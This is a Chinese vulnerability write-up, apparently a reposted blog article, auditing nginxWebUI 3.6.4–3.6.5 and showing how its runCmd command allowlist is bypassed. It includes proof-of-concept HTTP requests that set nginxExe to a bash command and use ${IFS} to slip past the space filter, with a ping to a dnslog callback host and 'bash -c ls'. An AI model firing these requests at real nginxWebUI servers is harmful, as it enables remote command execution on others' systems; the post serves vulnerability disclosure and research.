【nginxWebUI两部曲之二】nginxWebUI 3.6.5版本漏洞审计与绕过(含poc)

目录：  

0x01  概述

0x02  3.6.4版本审计

0x03  3.6.4漏洞构造

0x04  尝试绕过

0x01  概述  

nginxWebUI runCmd远程命令执行漏洞时间线：

- 5月19日 官方发布新版本（3.5.2）修复漏洞

- 5月26日 漏洞细节在安全社区（火线）公开披露

- 6月27日 美创科技发布内部漏洞通告

- 6月29 官方发布3.6.2 、3.6.3进一步修复runCmd远程命令执行漏洞

- 6月30 官方发布3.6.4 进一步修复runCmd远程命令执行漏洞

- 7月11 官方发布3.6.6 进一步修复runCmd远程命令执行漏洞

目前已跟进版本：

3.4.7-3.6.3版本代码分析参考上一篇：

0x02  3.6.4版本审计  

定位到命令执行接口：nginxWebUI-3.6.4srcmainjavacomcymcontrolleradminPageConfController.java 330行

在这里runcmd接收2个参数：cmd和type。先检查type是否为空，不为空则调用settingService.set(type, cmd)使用配置文件的相关配置：

然后使用了if (!isAvailableCmd(cmd)) ，检查cmd是否为有效的命令

跟一下!isAvailableCmd：366行

一个布尔类型私有方法，检查cmd参数是否有效，过滤了获取的所有路径，检查命令是否属于以下命令：

• "pkill nginx"

• "taskkill /f /im nginx.exe"

• "systemctl stop nginx"

• "service nginx stop"

• "net stop nginx"

• "systemctl start nginx"

• "service nginx start"

• "net start nginx"

符合返回true，否则返回false，并返回错误信息。然后将传入的直进行处理，并且与nginxEXE参数进行判断是否相等，即将命令与nginx 服务端执行的命令进行对比。

随后回到runcmd方法：然后是一个判断系统为win或者linux，调用不同的系统命令。

然后对结果进行非空判断和内容正则。

0x03  3.6.4漏洞构造  

根据前文代码的分析，要继续构造命令执行，就必须传入cmd参数，且绕过isAvailableCmd中对 nginxDir和nginxExe的校验。

我们找到了处理这两个参数的saveCmd方法：272行

该方法接收三个参数nginxPath、nginxExe和nginxDir，在方法内部调用ToolUtils.handlePath进行过滤处理，即黑名单的方式对以下空格和符号进行转义替换。

0x04  尝试绕过  

在为linux下，linux把${IFS}会被当做空格：

访问nginxweibui

配置nginxExe参数：即将isAvailableCmd中的nginxExe预设成我们将要执行的命令。

命令执行：

POST /adminPage/conf/runCmd HTTP/1.1Host: x.x.x.x:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 35Origin: http://x.x.x.x:8080DNT: 1Connection: closeReferer: http://x.x.x.x:8080/adminPage/conf/runCmdCookie: SOLONID=ce4041f594264664b6f51a641b8a77e2; Hm_lvt_8acef669ea66f479854ecd328d1f348f=1689320655; Hm_lpvt_8acef669ea66f479854ecd328d1f348f=1689321911
cmd=ping${IFS}22dck7.dnslog.cn -c 1

Dnslog返回成功。

    其他命令：

POST /adminPage/conf/saveCmd HTTP/1.1Host: xxxnginxExe=bash${IFS}&nginxPath=ls

POST /adminPage/conf/runCmd HTTP/1.1Host: xxxxcmd=bash${IFS} -c ls

参考：

met32：https://xz.aliyun.com/t/12690

老有人问我要头图：

原文始发于微信公众号（b1gpig信息安全）：【nginxWebUI两部曲之二】nginxWebUI 3.6.5版本漏洞审计与绕过(含poc)